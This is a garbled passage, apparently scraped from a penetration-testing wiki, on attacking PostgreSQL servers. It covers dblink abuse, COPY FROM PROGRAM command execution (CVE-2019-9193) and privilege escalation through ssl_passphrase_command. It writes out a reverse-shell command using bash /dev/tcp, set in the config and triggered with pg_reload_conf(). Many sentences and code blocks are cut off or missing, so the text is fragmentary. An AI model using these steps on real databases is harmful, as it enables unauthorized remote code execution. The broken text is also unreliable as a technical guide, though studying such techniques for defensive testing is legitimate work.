dblink
is a PostgreSQL module that offers several interesting options from the attacker point of view. It can be used to connect to other PostgreSQL instances of perform TCP connections.
These functionalities along with the COPY FROM
functionality can be used to escalate privileges, perform port scanning or grab NTLM challenge responses.
You can read here how to perform these attacked.dblink_connect
.DEFAULT_ROLE_READ_SERVER_FILES
group and super users can use these methods on any path (check out convert_and_check_filename
in genfile.c
).:copy
cannot be used to write binary files as it modify some binary values.multi/postgres/postgres_copy_from_program_cmd_exec
module from metasploit.
More information about this vulnerability here. While reported as CVE-2019-9193, Postges declared this was a feature and will not be fixed.ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'
Path to the private key of the databasessl_passphrase_command = ''
If the private file is protected by password (encrypted) postgresql will execute the command indicated in this attribute.ssl_passphrase_command_supports_reload = off
If this attribute is on the command executed if the key is protected by password will be executed when pg_reload_conf()
is executed.rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key
ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'
ssl_passphrase_command_supports_reload = on
pg_reload_conf()
CHR
for basic clauses (character concatenation only works for basic queries such as SELECT, INSERT, DELETE, etc. It does not work for all SQL statements):$
. This queries return the same results: